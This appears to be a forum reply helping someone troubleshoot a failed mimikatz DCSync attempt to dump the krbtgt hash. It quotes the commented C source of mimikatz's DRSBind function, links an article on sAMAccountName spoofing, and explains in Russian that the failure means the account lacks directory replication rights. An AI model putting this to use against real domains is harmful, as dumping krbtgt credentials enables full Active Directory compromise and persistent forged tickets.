
lsadump::dcsync for the krbtgt hash

See the mimikatz sources and debug it — this is the DRSBind step of DCSync, where the bind to the DC's DRS interface either succeeds or is refused remotely:
C:
/*
 * Bind to the DC's DRS (MS-DRSR) interface over an already-established RPC
 * binding and negotiate the extensions used by the replication request that
 * follows (DCSync).
 *
 * hBinding          - connected RPC binding handle to the target DC.
 * NtdsDsaObjectGuid - GUID handed to IDL_DRSBind as the caller's NTDS-DSA object.
 * hDrs              - receives the DRS context handle when the bind succeeds.
 * pDrsExtensionsInt - in: the extensions we advertise to the server;
 *                     out: SiteObjGuid / dwReplEpoch / ConfigObjGUID copied from
 *                     the server's reply when the reply is large enough to hold
 *                     them, and dwExtCaps forced to MAXDWORD32.
 *
 * Returns TRUE only when IDL_DRSBind returned 0, the server sent an extensions
 * blob, and that blob's dwFlags contains DRS_EXT_GETCHGREQ_V8 or
 * DRS_EXT_STRONG_ENCRYPTION (a bitwise OR test: either flag alone is accepted).
 * On every post-bind failure the context handle is released with IDL_DRSUnbind
 * so the caller never inherits a dangling DRS handle; the server's reply buffer
 * is always released with MIDL_user_free.
 *
 * The reply is peer-controlled data: its cb field (byte count of the blob after
 * cb itself, hence the "- sizeof(DWORD)" in each comparison) is checked before
 * every field is touched. Each copy is gated on cb reaching the offset of the
 * field presumed to follow it in DRS_EXTENSIONS_INT, i.e. the whole field must
 * be present - the assumed layout (SiteObjGuid, Pid, dwReplEpoch, dwFlagsExt,
 * ConfigObjGUID, dwExtCaps) is inferred from the offsets used; verify against
 * the struct definition. A bind error is a remote decision by the DC (typically
 * the calling context lacking replication rights), not a local fault.
 */
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs, DRS_EXTENSIONS_INT *pDrsExtensionsInt)
{
    BOOL bound = FALSE;
    ULONG bindResult;
    DRS_EXTENSIONS_INT *pServerExt = NULL;

    RpcTryExcept
    {
        bindResult = IDL_DRSBind(*hBinding, NtdsDsaObjectGuid, (DRS_EXTENSIONS *) pDrsExtensionsInt, (DRS_EXTENSIONS **) &pServerExt, hDrs);
        if(bindResult != 0)
        {
            /* Server refused the bind; no context handle to release. */
            PRINT_ERROR(L"IDL_DRSBind: %u\n", bindResult);
        }
        else if(!pServerExt)
        {
            /* Bound, but no extensions came back: unusable, drop the handle. */
            PRINT_ERROR(L"No DRS Extensions Output\n");
            IDL_DRSUnbind(hDrs);
        }
        else
        {
            /* Minimum size: cb must at least cover dwFlags. */
            if(pServerExt->cb < FIELD_OFFSET(DRS_EXTENSIONS_INT, SiteObjGuid) - sizeof(DWORD))
            {
                PRINT_ERROR(L"Incorrect DRS Extensions Output Size (%u)\n", pServerExt->cb);
            }
            else
            {
                /* Either capability flag is enough to continue. */
                if(pServerExt->dwFlags & (DRS_EXT_GETCHGREQ_V8 | DRS_EXT_STRONG_ENCRYPTION))
                    bound = TRUE;
                else
                    PRINT_ERROR(L"Incorrect DRS Extensions Output (%08x)\n", pServerExt->dwFlags);

                /* Copy optional trailing fields, each only if fully present. */
                if(pServerExt->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, Pid) - sizeof(DWORD))
                {
                    pDrsExtensionsInt->SiteObjGuid = pServerExt->SiteObjGuid;
                    if(pServerExt->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwFlagsExt) - sizeof(DWORD))
                    {
                        pDrsExtensionsInt->dwReplEpoch = pServerExt->dwReplEpoch;
                        if(pServerExt->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, ConfigObjGUID) - sizeof(DWORD))
                        {
                            /* dwExtCaps is overwritten locally, not taken from the server. */
                            pDrsExtensionsInt->dwExtCaps = MAXDWORD32;
                            if(pServerExt->cb >= FIELD_OFFSET(DRS_EXTENSIONS_INT, dwExtCaps) - sizeof(DWORD))
                                pDrsExtensionsInt->ConfigObjGUID = pServerExt->ConfigObjGUID;
                        }
                    }
                }
            }
            MIDL_user_free(pServerExt);
            if(!bound)
                IDL_DRSUnbind(hDrs);
        }
    }
    RpcExcept(RPC_EXCEPTION)
        PRINT_ERROR(L"RPC Exception 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
    RpcEndExcept
    return bound;
}
Or read this: https://www.sentinelone.com/blog/samaccountname-spoofing-kdc-bamboozing/
 
Это удалённая ошибка, а не локальная: у тебя нет прав для дампа NTDS (для DCSync нужны права репликации каталога — DS-Replication-Get-Changes и DS-Replication-Get-Changes-All), как минимум в том контексте безопасности, который ты указал в команде.
 

